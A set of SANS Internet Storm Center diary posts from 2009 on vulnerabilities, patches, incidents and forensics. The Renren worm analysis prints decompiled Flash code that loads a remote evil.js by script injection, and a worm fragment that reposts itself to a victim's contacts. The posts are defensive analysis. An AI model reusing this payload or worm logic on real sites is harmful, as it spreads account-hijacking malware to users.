We are aware of a new 0-day exploit that was posted on Milw0rm today.

According the exploit, it was suppose to work on both IIS 5.0 and 6.0, on the FTP module.

Also according it, it affects IIS 6.0 with stack cookie protection.

The latest on this is that HDMoore is porting it to the MetaSploit framework.

We will update this diary with more info as we get it.

UPDATE3: SourceFire Blog about it

UPDATE2: US-CERT released an advisory on it: https://www.kb.cert.org/vuls/id/276653

UPDATE: Emerging Threats have released a signature for the milw0rm IIS-FTP
exploit. It's available in the signature tarballs and a history is available in CVS:
http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_IISFTP
Wiki: http://doc.emergingthreats.net/bin/view/Main/2009828

---------------------------------------------------------------

Handler on Duty: Pedro Bueno (pbueno /%%/ isc. sans. org)

Twitter: http://twitter.com/besecure

One of our readers, Scott F., yesterday submitted to the ISC that he had been notified in early July that one of his hosted web servers had been taken offline.  Yesterday the hosting service notified Scott that a rogue Trojan 'worm' had been discovered on the system.  Scott is now taking action to recover his system and application from the source files with a fresh install.

Which brings me to the subject of today's diary: "How do I recover from....?"  The question is intentionally vague to prompt everyone to fill in the blanks.  Recover from a system hack, a natural disaster, catastrophic equipment failure, theft etc., etc., the answers to these questions are also very broad, however to enact an effective recovery, the answers need to be as focused as they can possibly be.  Some of the crucial items to consider

Where is my source code being stored offline?

Where is my data being stored?  Do I have an off-site contingency?

What is my recovery procedure going to be in case of 'x', where 'x' is a given failure?

How can I exercise these plans?

These are only a few of the questions that address the recovery process.  For any pointed questions, please give us a shout.

tony dot carothers at gmail

This past week I have been using Immunet Protect as an additional layer of protection with my antivirus to hopefully gain an edge against malicious code. This software was recently launched Aug 19, (still in beta) and can be used as a standalone or an add-on with your existing anti-virus product. It is always a good idea to have multiple layers of protection and Immunet Protect works quite well with other antivirus and super-charge your existing AV with cloud-based AV protection.  If you don’t have an existing AV product, Immunet Protect provides a base level of protection from several million threats.

An interesting concept about Immunet is the fact that it is moving the desktop into the cloud where it harness its power with your friends, family and the broader community by collecting information on what is safe and not safe from its community. This method of detecting malware will revolutionize the way virus detection and prevention is done because it reduces the publishing delay to zero. If someone in the community encounters a threat, everyone else will get protection against that threat. While you are online, your system always queries the cloud to determine whether something is malicious before making a decision.

It is lightweight and only uses between 10 to 20 MB of RAM and the best part of it, it is FREE. I would recommend it to family, friends, students, etc. as an another layer of defense against malicious code.

If you want to try it out, get it here but first, check out the basic installation requirements here.
 

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

apache.org was down this morning and reports are that one of their servers has been compromised due to an SSH key possibly being exposed. Their web sites are now back online.An overview of the incident can be read here: http://blogs.apache.org/infra/entry/apache_org_downtime_initial_report

Cheers,
Adrien de Beaupré
EWA-Canada.com

In a paper titled "A Practical Message Falsification Attack on WPA" researchers in Japan describe how to perform the Beck-Tews style attack against any WPA-TKIP implementation, in under a minute. The paper and upcoming presentation have already been covered in the mainstream media. Thanks to all who wrote in.

If your hardware supports it, time to consider moving to WPA with AES or WPA2.

Cheers,
Adrien de Beaupré
EWA-Canada.com

The National Credit Union Administration (NCUA) published an interesting advisory here:

http://www.ncua.gov/news/press_releases/2009/MR09-0825a.htm

Member credit unions evidently are reporting receiving letters which include two CDs. The letters claim to originate form the NCUA and advertises the CDs as training materials. However, it appears that the letter is a fake and the CDs include malware.

We have not heard about this scheme affecting any other targets, but please let us know if you see something like this. Malware delivery via USPS has certainly been suggested before.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Cisco issued a security advisory for its  1100 and 1200 Series access lightweight points. The advisory is based on work done by wifi IDS firm AirMagnet. The problem is pretty common and basic: How do you establish a secure connection over an insecure medium in order to configure a device. A new device will not have any encryption keys installed yet. We first need to establish some basic configuration options in order to enable encryption and exchange keys.

This is of course in particular tricky over wireless as you do not control the medium. Cisco uses an Over-The-Air-Provisioning (OTAP) protocol that uses multicast data to find a controller. During this initialization phase, a rogue controller could respond and send a bad configuration to the access point, disabling the device.

It should not be possible to setup a rogue access point using the actual networks encryption keys, as they are not known to the attacker. But it is a first step to possibly get a foothold in an environment.

Cisco provides an advisory here: http://tools.cisco.com/security/center/viewAlert.x?alertId=18919 . The quick summary: Establish basic configuration options like encryption keys and preferred controller lists before deploying the device.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Microsoft released SP2 for it latest and greatest version of Windows Server Update Services (WSUS).

You can find a more detailed description of the update here: http://support.microsoft.com/kb/972455

The most important feature is probably the integration with up and coming versions of Windows like 2008 R2 and Windows 7. Without WSUS support, it would be hard for many organizations to deploy these new Windows versions.

One improvement that caught my attention:

At first, if you think about it, an IPv6 address can have up to 39 characters if you represent it as 2001:0db8:1111:2222:3333:4444:5555:6666 (8*2 digits + 7 colons). However, it is also possible to add a netmask like /128 or /64, which will exceed the size limit of 40 characters. I find little issues like this to be typical gotchas in organizations converting to IPv6.

There are no critical "must install today" features as far as I can tell in this release. Test it carefully and deploy once ready.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

A few days ago a lot of media wrote about a Flash worm. I managed to get hold of samples and analyzed it (thanks to Peter Kruse of CSIS for the samples).

First of all, while the exploit code contains Flash, it is actually just used as an attack (or, if we stretch it, infection) vector. The worm itself is contained in JavaScript and is very similar to the Twitter worm I analyzed back in April this year (see http://isc.sans.org/diary.html?storyid=6187). That is not surprising as both worms are attacking similar services.

The worm was first identified on a popular Chinese social web site (for schools, if I'm not wrong), Renren (http://www.renren.com). This site is in many ways similar to Twitter or Facebook, but much more media intensive and it allows users to share various information, including pictures, movies etc.

Users of this site can share videos with each other (same as on Facebook). Besides other media, users can also point to Flash movies and this was enough for the attacker to exploit one small error in the video player code used by the Renren site.

The URL to an SWF file posted by a user was processed by a function called playswf(). Among other things this function creates an embedded object (application/x-shockwave-flash) that points to the user supplied SWF file.

Now, before digging into what this worm does, I'd like to point out how dangerous embedding SWF files can be. It is very common that authors put basic XSS protection into their programs (for example, preventing users from entering the <script> tag), however, Flash files can also be dangerous – I've successfully used them during various penetration tests to evade web application firewalls (which are not the solution to bad coding!).

Back to the worm – the playswf() function creates the following object:

<embed src=”"+o.filename+”” type=”application/x-shockwave-flash”
“+”width=”"+(o.width||”320″)+”” height=”"+(o.height||”240″)+”” allowFullScreen=”true”
wmode=”"+(o.wmode||”transparent”)+”” allowScriptAccess=”always” ></embed>

The dangerous part is highlighted in yellow – the allowScriptAccess parameter controls the level of access to the local HTML page by the Flash object. By default, this parameter is set to "sameDomain", which means that a Flash object can only access the HTML page if it was retrieved from the same domain. In other words, by omitting this parameter the Flash attack vector would be effectively disabled since the attacker wasn't able to put the Flash file in the same domain as the main site.

However, by setting this parameter to "always", the Flash file can directly access any element of the local HTML page, including (you guess) cookies.

The attackers embedded a link to a malicious Flash file which was only 369 bytes long. Since Flash files are bytecode, we can decompile them to see what they do. The malicious file had two DOACTION sections. The first one is included below:

var fun = 'var x=document.createElement("SCRIPT");x.src="http://n.[removed].com/xnxss1/evil.js"; x.defer=true;document.getElementsByTagName("HEAD")[0].appendChild(x);';
    flash.external.ExternalInterface.call('eval', fun);
  }

It's pretty obvious what this script does. It creates a variable fun which contains some HTML code. First, it creates an element called SCRIPT in the local HTML page and points it to a malicious JavaScript file. The defer attribute tells the browser to process this script in the background and proceed. Then it takes first HEAD object and appends the malicious script to it.

The second DOACTION section (not shown here) just loads a legitimate movie so the user isn't aware of what's going on.
As you can see from above, the Flash file is actually just used to exploit the web page, while the real code is in the evil.js file. This type of vulnerabilities has their own name – Cross Site Flashing (XSF), as they are very similar to XSS vulnerabilities.

Finally, the evil.js file, which has the main worm body, uses attacked user's credentials in order to post this movie to all his contacts. We saw this with the Twitter worm – this one is not different at all as it uses Ajax as well to call methods that allow it to post the movie. Part of the script (shortened) is shown below:

var data = 'post= "filter":null,"reduceRight":null [...] :"Wish You Were Here @ 2016.","summary":"'+evil_swf+'","noteId":0}';
 data += '&tsc=';
 data += tsc;
 xhr_send("post","http://share.renren.com/share/submit.do",data,"preSend");

The worm is, as you can see, nothing spectacular, however, it shows that technologies such as Flash must not be ignored as they can be (and we saw this in the history already) another vector for attacks, and this time it didn't matter what version of Flash you were running since the code on the web site was vulnerable.

--
Bojan
INFIGO IS

We've received submissions from Chuck, Andrew and others about Twitter being unreachable.  It had been non-responsive for us as well and for the DownForEveryoneOrJustMe site.  At this time, Twitter appears to be back up.  They have a status update here that indicates they had some unexpected issues with more details to follow.

A number of anti-virus vendors are reporting new malware that takes a slightly different approach than the norm.

BitDefender and Kaspersky refer to the virus as Win32.Induc.A. 

What is different about this virus is that it compromises systems running the Delphi compiler.  Once the compiler itself is compromised all resulting code generated by the compiler is also infected.  The virus is relatively simple in that it only wants to propogate, no other payload has been utilized.

A funny side effect is that  in the few days since this virus has been detected in the wild, a number of trojans have been discovered to be affected with the virus.  Obviously they were compiled with an infected Delphi compiler.

According to the people over at BitDefender the easiest way to detect if your Delphi instance is infected is to "check if their compilers' Lib folder contains a SysConst.bak file (the most obvious sign of infection) and to rename it to SysConst.dcu if it exists, overwriting the compromised file, then recompile their applications."

Special thanks to reader Artyom for pointing us to this story.

Update:

A commenter dusted some cobwebs out of my brain by pointing to a paper I read as a lowly undergrad some 25 years ago.  Ken Thompson of Bell Labs fame presented a paper to the Turing Award Lecture entitled "Reflections on Trusting Trust".  In this paper Mr. Thompson mentions the concept of compromising the Unix login binary by first infecting the compiler.

-- Rick Wanner - rwanner at isc dot sans dot org

VMware has released the following new security advisory, VMSA-2009-0010

This advisory results in updates to

VMware Workstation
VMware Player
VMware ACE

Updates for VMWare Server 1.X and 2.X are still pending.

Thanks to the good people over at VMWare for the heads-up!

-- Rick Wanner - rwanner at isc dot sans dot org

A new version of Thunderbird, version 2.0.0.23, is available.  Thus update fixes MFSA 2009-42 (Compromise of SSL-protected communication). 

If you are a Thunderbird user, it is probably best to apply this update as soon as convenient.

-- Rick Wanner - rwanner at isc dot sans dot org

Time for your daily patch.

CORE security technologies published a vulnerability in libpurple.  Libpurple is the backend frame work to many Instant Messenger clients.

Pidgin, Finch, Adium, Meebo, and Gaim among others.  Although CORE only specifically mentions GAIM, Libpurple, Pidgin, and Adium specifically, the other libpurple based ones may be vulnerable as well.

Versions of Libpurple <= 2.5.8 (Pidgin <=2.5.8 and Adium <=1.3.5) are vulnerable.  The vulnerability is an exploit in the function msn_slplink_process_msg() which handles instant messages from the MSN network. 

All it takes to exploit this vulnerability is to receive a message from another MSN user.  They do not have to be on your buddy list.  Unless your buddy list states that you only allow specific users to contact you, it's the only mitigation step.  (Other than patching or logging off of the MSN network.)

Solution:

Upgrade to a version of your respective IM client that is based off of pidgin.  Non vulnerable versions of Libpurple are >=2.5.9.

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

One of the friends of the Internet Storm Center, Johnathan Ham, put out a nice Network Forensics Puzzle Contest.  Check it out below.

The answers can be sent to the email listed below.  (Don't sent them into the Internet Storm Center.  It's not our contest!)

Good luck!

*Prizewinner to be announced at Sec558 "Network Forensics" in San Diego, 9/16-9/18.

Anarchy-R-Us, Inc. suspects that one of their employees, Ann Dercover, is really a secret agent working for their competitor. Ann has access to the company's prize asset, the secret recipe. Security staff are worried that Ann may try to leak the company's secret recipe.

Security staff have been monitoring Ann's activity for some time, but haven't found anything suspicious-- until now. Today an unexpected laptop briefly appeared on the company wireless network. Staff hypothesize it may have been someone in the parking lot, because no strangers were seen in the building. Ann's computer, (192.168.1.158) sent IMs over the wireless network to this computer. The rogue laptop disappeared shortly thereafter.

"We have a packet capture of the activity," said security staff, "but we can't figure out what's going on. Can you help?"

You are the forensic investigator. Your mission is to figure out who Ann was IM-ing, what she sent, and recover evidence including:

1. What is the name of Ann's IM buddy?
2. What was the first comment in the captured IM conversation?
3. What is the name of the file Ann transferred?
4. What is the magic number of the file you want to extract (first four bytes)?
5. What was the MD5sum of the file?
6. What is the secret recipe?

Here is your evidence file:

http://jhamcorp.com/contest_01/evidence.pcap
MD5 (evidence.pcap) = d187d77e18c84f6d72f5845edca833f5

The MOST ELEGANT solution wins. In the event of a tie, the entry submitted first will receive the prize. Scripting is always encouraged.  All responses should be submitted as plain text files.

Exceptional solutions may be incorporated into the SANS Network Forensics Toolkit. Authors agree that their code submissions will be freely published under the GPL license, in order to further the state of network forensics knowledge. Exceptional submissions may also be used as examples and tools in the Network Forensics class. All authors will receive full credit for their work.

Email submissions to contest@jhamcorp.com. Deadline for submissions is 9/10. Good luck!!

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler

Following up on Mari's earlier post about "Surviving a third party audit", here's one more pointer: If you've ever been on the receiving end of an audit, you probably found out that the core competency of an auditor seems to be in comparing two lists: Accounts in AD with the leaver list from HR. Implemented authorization with approved authorization. Issued patches with installed patches. Basic stuff all in all, and in the eye of many techies, proof that the auditor doesn't have the clue to find the real risks.

Well, maybe. But it is up to us all to raise the bar. Recently, in an audit at a third party site, I found that they were carefully patching their Unix systems, and had been doing so for years - good! But nobody ever thought of comparing the list of "Servers known to the patching tool" with "servers on the network". Consequence: Two dozen of their servers never got any patches. And nobody noticed - their lovely "status dashboard" turned "green" as soon as the patching tool reported "completion". Written up for things like these, an auditee usually gets annoyed with the auditor - but really should be annoyed at himself: Nobody should need an auditor to find obvious gaps like this one.

When was the last time you checked that all your systems have an up-to-date anti-virus without relying on what the anti-virus software's "management console" tells you? Start with just comparing the server names from the anti-virus console with those from, for example, Active Directory. Match? Then take it to the next level: query with some other tool (SMS/SCCM, WMIC, scripts, etc) to collect the version of the pattern file installed across all systems. Still a match?

To check your protection, compare two lists every now and then. It ain't that hard - even an auditor can do it :).
 

If you are, as I am, a GCFA who attended Rob Lee's famous training in the not-so-recent past, you probably still are "carving out" partitions from within an acquired full disk "dd" image by running it through another "dd". Given how quickly the disk sizes are increasing, this is highly inefficient both in terms of disk space and analyst time used.

But there's a better way. You already know how to use "loopback mount" on Linux to mount an image? Well, loopback mount supports an "offset" parameter that lets you mount a partition directly from within a larger full-disk image. Thusly:

root@ubuntu:/media/disk-1# ls -al
total 39082701
drwxrwxrwx 1 root root 4096 2009-07-12 13:33 .
drwxr-xr-x 4 root root 4096 2009-08-18 19:04 ..
-rwxrwxrwx 1 root root 878 2009-07-07 11:46 fdisk
-rwxrwxrwx 1 root root 701 2009-07-07 11:47 hdparm
-rwxrwxrwx 2 root root 40020664320 2009-07-07 14:34 image-sda
-rwxrwxrwx 1 root root 43 2009-07-07 12:02 md5sum
-rwxrwxrwx 1 root root 43 2009-06-29 13:13 md5sum-sda
drwxrwxrwx 1 root root 0 2009-07-11 19:03 $RECYCLE.BIN
root@ubuntu:/media/disk-1# fdisk -ul image-sda
You must set cylinders.
You can do this from the extra functions menu.

Disk image-sda: 0 MB, 0 bytes
255 heads, 63 sectors/track, 0 cylinders, total 0 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x9c879c87

Device     Boot Start End      Blocks    Id System
image-sda1 *    63    78140159 39070048+ 7  HPFS/NTFS
Partition 1 has different physical/logical endings:
phys=(1023, 254, 63) logical=(4863, 254, 63)

root@ubuntu:/media/disk-1# mount -o ro,loop,offset=32256 -t auto image-sda /media/image
root@ubuntu:/media/disk-1# cd ..
root@ubuntu:/media# cd image
root@ubuntu:/media/image# ls
AUTOEXEC.BAT favorites ntldr Start Menu blp INFCACHE.1 pagefile.sys System Volume Information boot.ini IO.SYS Program Files temp
CONFIG.SYS MSDOS.SYS RECYCLER WINDOWS Documents and Settings NTDETECT.COM spoolerlogs
root@ubuntu:/media/image#

The magic "32256" offset passed to "mount" is easily explained as the start of the partition you are interested in (63 in this case) multiplied by the unit size (512 in this case).  If you have more than one partition, just repeat the above steps for the other slices.

There you go. This easily saves several hours and untold gigabytes of disk space compared to the GCFA "carving out" method.

Sysinternals has released v1.4 that fixes a bug that was introduced in v1.3. This update fixes the compatibility problem with Windows XP and Windows Server 2003.

technet.microsoft.com/en-us/sysinternals/dd996900.aspx

Deb Hale Long Lines, LLC

A security bulletin has been issued and a hotfix has been made available for ColdFusion version 8.0.1 and earlier versions and for JRun 4.0.  A critical vulnerability has been identified that could lead to the potential compromise of user accounts or compromise of the affected system.

For more information see:

www.adobe.com/support/security/bulletins/apsb09-12.html

Deb Hale Long Lines, LLC

Recently there seems to have been a lot of activity with websites getting hacked.  Folks are getting really frustrated and are looking for answers to what is causing the problems and what they can do to protect their sites from compromise.

Unfortunately I am not a web development expert.  We do have Handlers that are...  I just don't happen to be one of them.  My expertise with websites is hosting them and protecting the servers that we host our customers sites on.  I monitor activity on our servers and check log files daily for any unusual activity or attempts to hack our customers sites or attempts to hack into our servers.  The last few weeks we have had an increase in the attempts to access our servers (brute force).  As soon as these attempts are flagged they are added to the blocklist for our network.  It is incredible to me how many IP's I have had blocklisted (blocked) in a short amount of time.  

We had two customers domains get wacked.  In both cases the index.html file was replaced with a modified file that contained a hidden link to .ru websites.  In both cases these "alterations" were found to be the result of a Gumblar type infection on the customers PC that is used to do the upload of the website to our server.  It appears in both cases that it was a Gumblar type infection, however instead of the typical Gumblar that we saw back in the May 2009 timeframe - the domains involved were a couple of .ru domains.  Perhaps just shifting resources a little or perhaps a new strain of an old bad guy. In investigating the infection in the two domains involved, I came across a really good article explaining what Gumblar was all about. 

www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/

The initial infections were both discovered over the weekend so I was unable to contact the customers immediately to let them know what was going on.  In both cases I disabled the index.html files and changed the passwords on the ftp accounts on the domains.  In both cases for several days afterwords I saw many attempts to login to the ftp accounts with incorrect passwords from multiple China IP addresses.  

This was an interesting exercise in web security for me.  My assumption was that the server itself was lacking in security.  I therefore worked very hard after taking this position to make sure that our webhosting servers were secured to the best of my ability and I aggressively monitor these servers to make sure that they continue to be secure.  Now I know, no matter how secure your hosting company tries to make your domains it may be your own internal lack of security practices that are putting your domains in jeopardy.

So my question to our readers is:

What are you doing to protect your webpages? 

We have had novice webpage developers in the past ask us what they can do to protect the security of their webpage.  Unfortunately we see that anyone now can create a webpage.  It doesn't take any special education or skills to create a webpage as we have witnessed by looking at the social networking sites. In these sites anyone (maybe even a monkey)  can create their own webpages. ( We have seen how secure that is). So what are your recommendations?

I would like to hear from you.  Please let me know if I can include your information in the diary. I will publish a list of the good tips that I get from you our readers.

Deb Hale Long Lines, LLC

We received an inquiry today regarding a popular utility domain being unavailable.  It appears that there is some problem with tcpdump.org availability.  Does anyone have any information as to the cause for this outage?  Please let us know.

 Deb Hale Long Lines, LLC

Update: www.tcpdump.org is back online.

We received a note from a reader who wanted to remain anonymous that the MS09-039 vulnerability is actively exploited in the wild. To remind you, this vulnerability affects servers with the WINS service installed. The patch fixes two vulnerabilities.

We do not have any technical information yet. However, the DShield graph shows a relatively high increase in targets for port 42 (see http://isc.sans.org/port.html?port=42):

 

TCP port 42 is used for WINS replication. It's also interesting that the number of sources isn't that high as well.

If you have some technical information or manage to acquire network traffic for this port (especially if coming from outside) please let us know.

--
Bojan

Thousand of sites were mass defaced on yet another large web hoster (in this case servage.net) possibly via MyBB or similar vulnerabilities. On a related note sites hosted at 3dgwebhosting.com had been essentially offline since the 14th. This would be a good time to point out the risk of having your web site at a large hosting firm, particularly if their security or availability of service is less than desirable.

If you have experiences with a web hosting firm, or have additional information on recent mass web defacement let us know!

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

How serious are you about your company's information security?  You will get very serious quickly when your company is audited by a third party.  These aren't third party vendors either, we're talking about the pending alliance will be profitable for your organization, get us through this audit...type of third party audit.

Playing these situations to your fullest abilities will not only increase the profitability of your business, it will also result in a tightened down security posture for your company.  I know, audits tend to cause headaches, neck pain as well as stress and the related "burn out" syndrome. But, I say expand your horizons, take a look at the big picture.  How close are you to the ISO standards?  What are those little pet projects that are curtailed by cultural issues which require C-level buy-in?  This may be the straw that increases security in your environment.  You may even get your pet project going again after frustrating funding delays.

I seem to be going through my fair share of these lately and have a few pieces of advice for those facing this same reality.

1. Stay calm and be prepared to the best of your ability.
2. Provide the auditor with a hard and soft copy of your IT Security policy, hopefully one based on Internationally agreed standards.
3. Use post-it flags to mark answers in the policy to any questions provided in advance. Saving the auditor time is a good thing.
4. Make sure your policies include the approval date and revision histories for each section of policy.
5. Set up a clean "routine" image workstation for the auditor to verify at their leisure.
6. Have copies of your Security Awareness Training materials ready.
7. Give heads up to the collateral departments which will need to provide requested documentation.  Like HR for background checks and Physical Security for access logs. 
8. Practice accessing your logs from any SEIM or logging device.  Double check logging enabled settings on all critical servers.
9. Allow the examiner to work in a secured environment away from prying eyes and curious onlookers.
10. Re-evaluate and study your questionnaire answers from the previous phases of the audit.
11. Showing your professionalism and your dedication to security will undoubtedly assist in obtaining the vital business alliances required in our global economy.

 Let me know some of your audit survival skills and secrets and I'll update this page with your ideas.

Mari Nichols - Handler on Duty

1. Jose Nazario's Twitter-based Botnet Command Channel
2.  Gunter Ollmann's Half of New Viruses Only Useful to Cyber-criminals For A Single Day

Edward alerted us to a new Linux vulnerability coming from how Linux deals with unavailable operations for some protocols.

All Linux 2.4 / 2.6 versions since May of 2001 are believed to be vulnerable.

More details are available here

Christopher Carboni - Handler On Duty

Often in the course of investigating a compromised machine or when analyzing malware in a sandnet or honeynet, I will have a complete capture of all the network activity in a pcap file and I want to pull out any files that were downloaded by the infected machine.  Unfortunately, I have not found any really good tools that allow me to full files from lots of different types of traffic.  A couple of years ago, I put together a perl script that used tcptrace and the HTTP::Response perl module to pull downloaded files out of HTTP traffic, but what about other forms of traffic?  FTP?  SMTP?  unknown TCP or UDP?  whatever?  My ideal tool would be able to reassemble the packets, discard headers, etc.  Well, the other day I noticed a post on Darknet about Xplico that might be (at least the basis of) the magic tool I'm looking for.  I'm just starting to play with it, but I figured this might be a good time to ask our readers what they use?  You can send us e-mail, use the contact form, or leave a comment.  Thanx in advance.

---------------
Jim Clausing, jclausing --at-- isc dot sans dot org

A couple of things I noticed on twitter today and thought you might be interested.  Our friend, Jeremy Stretch, at packetlife.net is in the process of updating some of his excellent networking cheat sheets (I mentioned his 802.1x one here).   Check them out at http://packetlife.net/cheatsheets/ and look for the ones at version 2.0 or greater (if your favorite hasn't been updated yet, check back in a few days, he isn't done yet).  Also, SANS instructor, Rob Lee points us to a couple of new cheat sheets for doing forensics on USB keys under XP or Vista/Win7.

---------------
Jim Clausing, jclausing --at-- isc dot sans dot org

   It appears that the latest update to Computer Associates "eTrust" anti-virus tool marks a number of Windows system files, including files that are part of eTrust itself, as malware rendering the system inoperable. Please use care in applying the update. It was released on Wednesday, Serial # 33.3.7051 . If you already have it installed and are experiencing problems: Doesn't look like there is a simple solution. If you have it installed but things are fine so far: Maybe consider turning off "on access scanning" until the next update is released (which probably has already happened)

References:

http://www.dynamoo.com/blog/2009/08/ca-etrust-goes-nuts-with-stdwin32-and.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Apple released  a security update today:

• APPLE-SA-2009-08-12-1  Security Update 2009-004

  This update address an issue with dynamic DNS updates with the BIND DNS server. An attacker could send a specially crafted update that could cause the DNS service to terminate.

  The security content of this update is:

  • BIND: CVE-2009-0696

More information should be available here soon on Apple's Security Update web site.

Robert wrote in last night in response to a story in the latest SANS NewsBites newsletter that discussed a report about the increasing use of flash cookies, using Adobe Flash, that are not affected the privacy controls setup in the web browser.

He pointed out that for folks who use Firefox, there is an add-on called Better Privacy that can block them.

Here is the original Wired story and here is a link to the Better Privacy add-on.

Apple released today Safari 4.0.3. which is said to include -at this point still unknown- some security fixes.

Quoting the information on the updater:

We'll update this when the details are actually released.

--
Swa Frantzen -- Section 66

Overview of the August 2009 Microsoft patches and their status.

--
Swa Frantzen -- Section 66

Juha-Matti pointed out multiple reports on a vulnerability in the widely used wordpress blog software that supposedly allows lets remote users reset the administrative password. They all lead to an original post on a full disclosure mailing list.

The attack uses an ability of PHP to not only set values on variables, but also make them arrays.

Basically a GET request can add data like:

http://www.example.com?data

Many environments use the data portion to create variable=value pairs:

http://www.example.com?variable1=value1&variable2=value2

actually the & needs to be encoded as &amp; to create proper html, but many ignore that rule

PHP takes this a notch further by allowing arrays to be created from a GET as well:

http://www.example.com?variable[]=value1&variable[]=value2

PHP being a typeless environment, this means if you process variables submitted by a user, the developer needs to be careful not to be fed an array by an attacker instead of the expected string ...

A fix is in the making here: http://core.trac.wordpress.org/changeset/11798. So I guess those who use wordpress will see an updated version soon enough.

One cannot stress the importance of proper input filtering enough.

The "handy" feature to submit an array in a GET request might well be ignored by many other developers beyond those at wordpress, so if you wrote PHP code yourself, best verify for this possibility.

--
Swa Frantzen -- Section 66

We have received reports that several vulnerabilities have been discovered in XML library implementations when parsing XML data. These vulnerabilities were reported by Codenomicon Labs  to CERT-FI which has been the main contact point with vendors to coordinate the remediation of these vulnerabilities. According to the CERT-FI advisory, if the application remains unpatched, the program can access memory out of bounds or can loop indefinitely leading to a denial of service and potentially code execution.

According to Codenomicon Labs, any applications using XML maybe affected and have different flaws. Python is currently working on a fix while Sun has issued an update and Apache has made a patch available.

CVE-2009-2625
Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
 

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

Teaching Comprehensive Packet Analysis in Ottawa, ON this coming September

According to sun: "Sun OpenSSO Enterprise (formerly Sun Access Manager and Sun Federation Manager) is the single solution for Web access management, federation, and Web services security."  This doesn't affect every network out there, but the larger outfits might be running it, and should responding to this.

Sun recently published advisories addressing three vulnerabilities ranging from Denial of Service to execution of arbitrary code.

CVE-2008-3529
Heap-based buffer overflow in the xmlParseAttValueComplex function in parser.c in libxml2 before 2.7.0 allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via a long XML entity name.
Base CVSS 10.0

CVE-2008-4225
Integer overflow in the xmlBufferResize function in libxml2 2.7.2 allows context-dependent attackers to cause a denial of service (infinite loop) via a large XML document.
Base CVSS 7.8

CVE-2008-4226
Integer overflow in the xmlSAX2Characters function in libxml2 2.7.2 allows context-dependent attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a large XML document.
Base CVSS 10.0
 

Note: In common with all of these CVEs is libxml2 2.7.x.

CVE-2008-3529, originally released September 2008, affects a lot of platforms.  Exploit code exists targeting Mac OSX which was patched back in May 2009.

While re-using code via libraries offers efficiencies in development and distribution of a technology, it also amplifies the impact of a vlunerability identified in said library.  It may be trivial to patch the issue in the library code, but that often requires many other applications to be rebuilt or relinked.  Often times these applications are home-grown and not maintained by large development teams.  Even organizations that have a group to manage vulnerabilities woudl be hard pressed to track the use of libraries in all of their in-house applications. 

I won't be surprised if we see these CVEs pop up again over the next couple of years.  The true impact of the vulnerability lies with the application that's calling it.  In the case of Sun OpenSSO this can have some serious implications.  You know the drill.

Due to the amount of people writing in, we thought it might be important to post something about Twitter being down right now.

According to several news sources we've been pointed to by our readers, Twitter seems be under a Denial of Service right now.  No further news on what is causing it, but I can confirm from a couple network locations in the United States that I cannot reach Twitter either.

Keep an eye on Twitter's status at: http://status.twitter.com, you know, once you can reach it.  Hopefully we'll know more about it soon.

-- Joel Esler | http://www.joelesler.net | http://twitter.com/joelesler

Details of these will be posted here soon:
http://support.apple.com/kb/HT1222

Updates can be obtained here:
http://www.apple.com/support/downloads/

bzip2 CVE-ID: CVE-2008-1372
Application termination.

CFNetwork CVE-ID: CVE-2009-1723
Incorrect URL displayed after a redirect.

ColorSync CVE-ID: CVE-2009-1726
Arbitrary code execution or application termination.

CoreTypes CVE-ID: CVE-2009-1727
Risk of execution of malicious JavaScript.

CoreTypes CVE-ID: CVE-2009-1727
Physical access may allow application management while system is locked via the screen saver.

Image RAW CVE-ID: CVE-2009-1728
Arbitrary code execution or Application termination.

ImageIO CVE-ID: CVE-2009-1722, CVE-2009-1721, CVE-2009-1720, CVE-2009-2188
Arbitrary code execution or Application termination.

Kernel CVE-ID: CVE-2009-1235
Local privilege escalation.

launchd CVE-ID: CVE-2009-2190
DOS

Login Window CVE-ID: CVE-2009-2191
Arbitrary code execution or Application termination.

MobileMe CVE-ID: CVE-2009-2192
Local credential reuse after signing out.

Networking CVE-ID: CVE-2009-2193
Arbitrary code execution or Application termination.

Networking CVE-ID: CVE-2009-2194
DOS

XQuery CVE-ID: CVE-2008-0674
Arbitrary code execution.
 

Sun has released a new version of Java (6u15).
Thanks go out to TommyB and DavidF who wrote in to tell us of the new java update.

This release addresses 7 SUN security alerts and a ton of bugs.
http://java.sun.com/javase/6/webnotes/6u15.html

Of special note for those of you who compile things from scratch is the Garbage Collector. SUN advises people to use "-XX:+UseParallelGC" to ensure debugging breakpoints are reliable.

Many of you have let us know that there is a new firefox version out that addresses a few issues.

Fixed in Firefox 3.5.2 & 3.0.13:
MFSA 2009-43 Heap overflow in certificate regexp parsing
MFSA 2009-42 Compromise of SSL-protected communication
MFSA 2009-38 Data corruption with SOCKS5 reply containing DNS name longer than 15 characters
 

Upgrading is recommended.

Mark H - Shearwater

For many pentesters, myself included, switches and routers are a favourite target when performing internal assessments.  Why ARP spoof devices on the network when you can configure mirroring ports and bring the traffic to you?  Having control of the switching infrastructure is just plain fun and in more than 50% of the tests we do they are ours in short order.  Badly configured switches and internal routers are almost as common as blank SA passwords on MSSQL databases (yes people do still have em).

